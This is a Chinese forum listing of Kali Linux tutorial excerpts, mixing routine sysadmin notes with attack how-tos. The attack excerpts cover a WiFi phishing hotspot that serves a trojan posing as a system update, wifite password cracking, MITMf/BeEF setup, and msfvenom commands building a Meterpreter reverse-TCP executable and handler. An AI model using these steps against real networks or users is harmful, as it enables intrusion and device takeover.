Linux Kali高级学习教程
介绍Linux KALI的使用方法和各种系统工具的下载方法。
404个主题在此版块
-
- 0 篇回复
- 137 次查看
git clone https://github.com/getlantern/lantern.git sudoapt-getinstalllibc6-dev-i386golangnpmlibappindicator3-devlibgtk-3-devlibappindicator3-y npmigulp-g link/usr/bin/nodejs/usr/bin/node cdlantern makelantern ./lantern 版权属于:逍遥子大表哥 本文链接:https://blog.bbskali.cn/119.html 按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。
Ken1Ve的最后回复, -
- 0 篇回复
- 115 次查看
自从Kali 2.0发布之后,会经常遇到安装vmware tools无法成功,或者提示安装成功了但是仍旧无法进行文件拖拽、复制和剪切的问题。 今天给新电脑装系统,重新下载了最新版,Kali 2017.1发现已经是Kali 3了。 经测试,安装Open-vm-tools替代VMware tools能够完美实现“自动适应客户机”(即自动适应客户机的分辨率,随意改变窗口大小)和与宿主机之间文件的复制粘贴功能。 安装apt-get install open-vm-tools-desktop fuse重启reboot 版权属于:逍遥子大表哥 本文链接:https://blog.bbskali.cn/121.html 按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。
Ken1Ve的最后回复, -
- 0 篇回复
- 117 次查看
同样我们这里利用的是WiFipumpkin这个钓鱼工具,先来说说思路。当别人连接我们搭建的钓鱼热点后,会自动跳转到我们的系统更新页面,要求下载系统更新程序,而这个程序就是我们的木马。一:开启钓鱼热点和昨天的步骤一个,首先开启钓鱼热点,然后选择modules下的dns-spoofer 注意~如果提示错误,先关闭代理! 在plugins选项中去掉前面的√ 二:配置目标 三:配置FACK update 然后启动服务。当别人访问时效果如下! 版权属于:逍遥子大表哥 本文链接:https://blog.bbskali.cn/124.html 按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。
Ken1Ve的最后回复, -
- 0 篇回复
- 112 次查看
简要描述ThinkPHP是一个免费开源的,快速、简单的面向对象的轻量级PHP开发框架,是为了敏捷WEB应用开发和简化企 业应用开发而诞生的。ThinkPHP从诞生的12年间一直秉承简洁实用的设计原则,在保持出色的性能和至简的代码 的同时,也注重易用性。目前ThinkPHP框架是国内使用量最大的框架之一,国内用户量众多。近日,360企业安全 集团代码卫士团队安全研究人员发现该框架V5.1.7-V5.1.8 版本在底层数据处理驱动解析数据的时候存在缺陷,一 定场景下,攻击者可以通过构造恶意数据包利用SQL注入的方式获取用户数据库内容。360企业安全集团代码卫士 团队已第一时间和ThinkPHP团队进行沟通修复,建议相关用户及时更新官方发布的新版本。 漏洞分析:注:改漏洞ThinkPHP官方团队在报送当天(2018-04-06)紧急进行了修复处理,详细请参考: https://github.com/top-think/framework/commit/39bb0fe6d50ee77e0779f646b10bce08c442a5e3以下漏洞分析基于ThinkPHP V5.1.8(2018-04-05未更新版) 这里我们主要跟进分析执行update操作的过程。为了方便理解,先直接放出函数的调用栈。 Mysql.php:200, think\db\builder\Mysql->parseArrayData() Builder.php:147, think\db\Builder->parseData() Builder.php:113…
Ken1Ve的最后回复, -
- 0 篇回复
- 114 次查看
一:终端命令wifite启动软件 二:按ctrl+c停止扫描 选择要破解的wifi 三:开始抓包 抓的包存放在 /root/hs/文件下 四:替换自己的密码字典全局搜索common.txt文件,替换为你自己的密码字典。 五:破解 六:完成破解 版权属于:逍遥子大表哥 本文链接:https://blog.bbskali.cn/134.html 按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。
Ken1Ve的最后回复, -
- 0 篇回复
- 123 次查看
php版<?php for($i=1;$i<=9;$i++ ){ for($j=1;$j<=$i;$j++ ){ echo "$j × $i =".$j*$i." ";//结果相乘并输出 } echo "<br>"; } ?>java版package priess; public class FFOR { public static void main(String[] args) { // TODO 自动生成的方法存根 for(int i=1;i<=9;i++) { for (int j=1;j<=i;j++) { System.out.println(j+"*"+i+"="+i*j+"\t"); } System.out.println(); } } } 版权属于:逍遥子大表哥 本文链接:https://blog.bbskali.cn/137.html 按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。
Ken1Ve的最后回复, -
- 0 篇回复
- 128 次查看
Mitmf 是一款用来进行中间人攻击的工具。它可以结合 beef 一起来使用,并利用 beef 强大的 hook 脚本来控制目标客户端。下面让我们一起看看如何在 Kali2.0上安装使用 Mitmf 。默认在2.0上并未安装,在之前的版本有安装。 首先,我们先进行工具依赖包的安装。打开 terminal 终端,输入如下命令: apt-get install python-dev python-setuptools libpcap0.8-dev libnetfilter-queue-dev libssl-dev libjpeg-dev libxml2-dev libxslt1-dev libcapstone3 libcapstone-dev libffi-dev file 以上结果出现一些安装包无法安装的情况,这里我们无需理会,继续我们的下一步操作即可。 依赖包安装完成后,就可以开始安装Mitmf 了、输入命令: apt-get install mitmf 不过这样安装完成后 mitmf 依然无法正常使用它的一些功能。因为缺少了 twisted 的版本兼容性。我们来安装适合 mitmf 的 twisted 。如果你已经安装过,那么先卸载之前的版本。输入命令: pip uninstall twisted shell 并用 wget 命令进行下载。wget http://twistedmatrix.com/Releases/Twisted/15.5/Twisted-15.5.0.tar.bz2 安装 twisted 。pip install…
Ken1Ve的最后回复, -
- 0 篇回复
- 112 次查看
很多人说病毒清除掉后留下很多尸体文件,虽然可以删除,但是他们无处不在,一个个干掉实在是太麻烦了。 比如viking留下的_desktop.ini;比如欢乐时光留下的desktop.ini、folder.htt;还比如病毒经常在你的硬盘跟目录下放上属性为系统+隐藏的autorun.inf,以及这个文件里run=字段后面的程序,数不胜数…… 那么如何来干掉这些垃圾?实际上你可以利用搜索功能从“我的电脑”范围内将这些垃圾搜索出来,然后CTRL+A全选,DEL删除!当然要记得搜索时在“更多高级选项”里把“搜索隐藏的文件和文件夹”和“搜索系统文件夹”两这个地方勾上,否则毛也搜不到! 以上是一个方法,但是下面这个方法会让你更爽,因为你不但要干掉这些该死的病毒,还能从中学会一些东西,能感受的到那些该死的文件被喀嚓的快感……那么还等什么,我们开始吧! 你将会看到一个批处理程序,基本上由DEL和FOR两个命令组成。基本框架和原理是很简单的:用FOR来循环所有的驱动器和目录,用DEL来删除目标文件。先看一下代码: FOR %%I IN (c:,d:,e:) DO CD /D %%I & FOR %% J IN (filename1, filename2, filename3) DO DEL %%J /A HS /F /S ECHO 目标文件删除完毕,按任意键退出 PAUSE 代码说明: 所有大写部分都是程序中不可修改的代码,红色和蓝色部分是可以修改的。 红色部分请修改成你当前的盘符,有多少个就写进去多少个,格式照猫画虎…
Ken1Ve的最后回复, -
- 0 篇回复
- 110 次查看
在一台被入侵的服务器上,我们发现了一个攻击者遗留下来的脚本。该脚本是由JavaScript编写的,主要功能是作为Windows后门及C&C后端使用。在这里我首先要向大家说声抱歉,为了保护客户的隐私,在本文中我不会对一些细节做太多的探讨和描述。 该脚本的体积非常的小只有不到2KB,唯一能表明它的存在的是一个名为“wscript.exe”的运行进程,这是一个合法的Windows程序。脚本的主要部分包含一个无限循环的命令等待,在将查询字符串“reflow”传递给C&C 之后,它会休眠4个小时。 C&C的回调如下所示: 为了获取更多的信息,我开始在各种搜索引擎和VirusTotal中搜索相关的代码段,但令我失望的是我什么也没发现。因此,我决定使用Recorded Future来帮助我寻找。Recorded Future可以通过扫描并分析成千上万网站、博客、twitter帐户的信息来找到目前和未来人们、组织、活动和事件之间的关联性。 在返回结果中匹配了三个在2017年12月删除的匹配项。缓存的数据和链接回的源帮助我用C&C包恢复了压缩文件。 在软件包中有四个主要脚本(3个PHP和1个JavaScript文件)被复制到Web服务器。web服务器可能受到攻击者控制或受到其它手段的危害。其中的主要脚本index.php包含了一个SVG动画,当访问者碰巧访问该页面后,会看到如下画面。 该脚本显示,当“reflow”传递到页面时,恶意JavaScript文件(被重命名为一个PNG文件)的内容将被发送到受害者PC,并通…
Ken1Ve的最后回复, -
- 0 篇回复
- 112 次查看
网卡一芯片为3070 优点:最要用来进行WiFi钓鱼。使用此网卡相比其他的网卡而言,钓鱼页面跳转是最快的。 网卡二芯片为:8187 优点:发送功率比较高,用传统的破解WiFi的方式(如抓包)等比较好用。 缺点:进行WiFi钓鱼时,钓鱼页面的跳转极其缓慢。 网卡三芯片:8812au 优点:支持5G/HZ 支持WiFi钓鱼 缺点:安装驱动比较困难 官方驱动安装教程 apt-get update apt install realtek-rtl88xxau-dkms 版权属于:逍遥子大表哥 本文链接:https://blog.bbskali.cn/156.html 按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。
Ken1Ve的最后回复, -
vim /etc/apt/sources.list按 i 键,删除里面的内容。粘贴下方的源 deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib 注意:前面有#号的不要管,那是被注释掉的。 保存后 执行命令 apt-get uodate && apt-get upgrade 原文链接:传送门 版权属于:逍遥子大表哥 本文链接:https://blog.bbskali.cn/159.html 按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。
Ken1Ve的最后回复, -
- 0 篇回复
- 107 次查看
中午还在午休,在以前公司上班的同时发来消息,说是数据库挂掉了。让我帮他看看。嗯……(虽然已离职,但是感情还是有的吗。)发来截图。的确是数据库挂掉了。 然后,开始了我一下午的填坑记。 恩嫩,mmp先看看能不能启动数据库。执行命令: service mysqld start恩 ,报错。 提示错误:/var/lib/mysql/mysql.cock 估计是mysql.sock文件丢失。然后已在遵循先百度后google的原则,找了半天还是无法解决问题。过程太艰苦。就不说了…… 查看数据库日志 恩恩 ,早上11:05分挂掉的。资讯了下十一点的时候有么有对数据库操作。说着是新增了虚拟主机来着,对数据库没有操作。这个就怪了…… 没事,我们接着找原因,既然是mysql.sock文件丢失,能不能从其他地方复制一份呢? 结果还是失败 mmp。想着不行就直接从装数据库吧,但是他那边没有备份,这时只能用一首《凉凉》来形容当时的心境了。好吧!不放弃接着找原因。 对当前系统分析 系统:centos7数据库:mariadb引擎: apache 等等,centos7中。使用mariadb代替了mysql。这也许不是mysql的问题而是mariadb的问题。 OK,我们试着启动mariadb service mariadb startOK,伟大的mysql终于启动了 版权属于:逍遥子大表哥 本文链接:https://blog.bbskali.cn/161.html 按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。
Ken1Ve的最后回复, -
- 0 篇回复
- 123 次查看
1.mysql的安装及卸载mysqld -install [服务名] 服务名称默认是mysql,若没有特殊需求 不建议修改 mysqld -remove [服务名] 或者 remove MYSQL(服务名) 2.mysql服务的启动和停止net start mysql net stop mysql3.登录MYSQLmysql -h主机地址 -u用户名 -p用户密码 (如连接远程数据库 :mysql -h192.168.xxx.xxx -uroot -p123) mysql -u用户名 -p用户密码(如连接本地数据库:mysql -uroot -p123) 4.显示命令:数据库版本信息:show variables like '%version%' 显示数据库列表 显示库中的数据表 use mysql;//打开数据库 show tables;显示数据表的结构: describe 表名;查看当前使用的数据库 select database(); 版权属于:逍遥子大表哥 本文链接:https://blog.bbskali.cn/163.html 按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。
Ken1Ve的最后回复, -
- 0 篇回复
- 153 次查看
压缩、解压缩及归档工具file-roller compress/uncompress: .Z gzip/gunzip: .gz bzip2/bunzip2: .bz2 xz/unxz: .xz zip/unzip tar cpio compress/uncompress compress [-dfvcVr] [-b maxbits] [file ...] -d: 解压缩,相当于uncompress -c: 结果输出至标准输出,不删除原文件 -v: 显示详情 uncompress 解压缩 zcat file.Z >file gzip/gunzipgzip [OPTION]... FILE ... -d: 解压缩,相当于gunzip -c: 将压缩或解压缩的结果输出至标准输出 -#:1-9,指定压缩比,值越大压缩比越大 zcat:不显式解压缩的前提下查看文本文件内容 实例:gzip -c messages >messages.gz gzip -c -d messages.gz > messages zcat messages.gz > messagesbzip2/bunzip2/bzcatbzip2 [OPTION]... FILE ... -k: keep, 保留原文件 -d:解压缩 -#:1-9,压缩比,默认为9bzcat:不显式解压缩的前提下查看文本文件内容 xz/unxz/xzcatxz [OPTION]... FILE ... -…
Ken1Ve的最后回复, -
- 0 篇回复
- 110 次查看
一:登录数据库格式:mysql -u 用户名 -p mysql -u root -p 数据密码后进入数据库: 二:显示数据库:show databases; 三:显示表use dvwa; #选择数据库 show tables; #显示表 四:查询 select * from users; 五:新建数据库create database xxx;xxx为数据库的名称 六:删除数据库drop database xxx; 版权属于:逍遥子大表哥 本文链接:https://blog.bbskali.cn/165.html 按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。
Ken1Ve的最后回复, -
- 0 篇回复
- 99 次查看
一:复制/etc/apache2/sites-available目录下的000-default.conf文件sudo cp /etc/apache2/sites-available/000-default.conf /etc/apache2/sites-available/priess.conf 二:将DocumentRoot /var/www/html 改为自己的目录,例如:DocumentRoot /home/huoty/mysite 清空里面原来的文件,复制下面内容 <VirtualHost *:80> DocumentRoot /var/www/html/ #原来的默认路劲 ServerName [url=www.baidu.com]www.baidu.com[/url] </VirtualHost> <VirtualHost *:80> DocumentRoot /var/www/priess/#新的路劲 ServerName [url=www.taobao.com]www.taobao.com[/url] </VirtualHost>也就是说:当我访问www.baidu.com时候跳转到html这个文件夹下面的站点。当我访问www.taobao.com的时候跳转到priess下的站点。 三:设置etc/host文件 四:将priess.conf 软链到sites-enabled:$ sudo ln -s /et…
Ken1Ve的最后回复, -
- 0 篇回复
- 117 次查看
一:制作对话框msfvenom -a x86 --platform windows -p windows/messagebox TEXT="bbskali.cn" -f raw > messageBox -a:操作系统的类型 64位和32位 -p:指定攻击平台 windows TEXT:对话框中显示的文字 -f:输出格式 二:制作二级标题msfvenom -c messageBox -a x86 --platform windows -p windows/messagebox TEXT="blog.bbskali.cn" -f raw > messageBox2 三:将c++打包生成exemsfvenom -c messageBox2 -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.3.209 LPORT=5555 -f exe -o Z.exeLHOST:本机ip地址 LPORT:端口 -o :生成文件 四:终端启动msfconsole并配置参数msf > use exploit/multi/handler msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf exploit(multi/handler) > sh…
Ken1Ve的最后回复, -
- 0 篇回复
- 147 次查看
阿里云centos7配置https 一:下载证书1:下载apacher 环境下的证书 证书中文件的内容 确定无误后继续下一步 二:上传证书文1:先在Apache的根目录创建一个 cert 文件夹 命令: cd /etc/httpd mkdir cert创建完成后,将所有的证书文件上传该目录下 三:安装OpenSSL命令: yum install mod_ssl openssl安装完成后开始配置ssl 命令: vim /etc/httpd/conf.d/ssl.conf DocumentRoot "/var/www/html" (去掉前面的#号) ServerName www.bbskali.cn:443 (去掉前面#号 该为自己的域名) SSLHonorCipherOrder on(去掉#号)分别将 SSLCertificateFile cert/public.pem SSLCertificateKeyFile cert/214389704890210.key SSLCertificateChainFile cert/chain.pem 改为你自己的证书配置参数 cert 就是你刚才创建的文件 修改完成后!:wq 保存退出 四:配置Apache命令 vim /etc/httpd/conf/httpd.conf 先查找看有没有这条命令 LoadModule ssl_module modules/mod_ssl.so 如果没有直接插入一条到里面 然后查找这条命令 IncludeOptional conf.d/*.conf …
Ken1Ve的最后回复, -
- 0 篇回复
- 113 次查看
通常,我们利用ping命令来检测本地的网络是否流通,但是这样为常常给黑客提供了便利。那么liunx该如何关闭ping呢? 1、内核参数设置允许/禁止 ping 设置(默认允许 ping) 临时允许/禁止 ping 操作的命令为:修改 /proc/sys/net/ipv4/icmp_echo_ignore_all 文件的内容,该文件内容只有 1 个字符,0 为允许 ping,1 为禁止 ping,无需重启服务器; 永久允许/禁止 ping 配置方法: 修改文件 /etc/sysctl.conf,在文件末尾增加一行: net.ipv4.icmp_echo_ignore_all = 1如果已经有 net.ipv4.icmp_echo_ignore_all 这一行了,直接修改 = 号后面的值即可的 0 表示允许,1 表示禁止。 修改完成后执行 sysctl -p 使新配置生效(重要)。 2、防火墙设置(此处的方法的前提是内核配置是默认值,也就是没有禁止 ping) 这里以 iptables 防火墙为例,其他防火墙操作方法可参考防火墙的官方文档。 允许ping设置 iptables -A INPUT -p icmp --icmp-type echo-request -j ACCEPT iptables -A OUTPUT -p icmp --icmp-type echo-reply -j ACCEPT或者也可以临时停止防火墙: service iptables stop禁止ping设置 -A INPUT -p icmp --icmp-type 8…
Ken1Ve的最后回复, -
- 0 篇回复
- 111 次查看
1、安装msf1.1、打开终端,进入安装目录(你想放在哪就进哪 cd /opt curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall1.2、chmod 755 msfinstall 1.3、./msfinstall 等它自动安装完毕,然后先不要启动,目前最新版的这个msf会问你要不要用自带到database,你想用自带到数据库就回车,想用自己到数据库就输入no回车 2、安装postgresqlapt-get install postgresql su - postgres psql password 1234562.5、可忽略这一项,如果你喜欢用psql到话(纯命令),安装postgresql到管理工具 2.5.1、安装apache apt-get install apache22.5.2、安装pgadmin apt-get install phppgadmin2.5.3、重启一下apache(好像也可以不用重启,我的什装好之后重启才能看到界面 /etc/init.d/apache2 restart2.5.4、登录页面应该就可以浏览了 http://127.0.0.1/phppgadmin…
Ken1Ve的最后回复,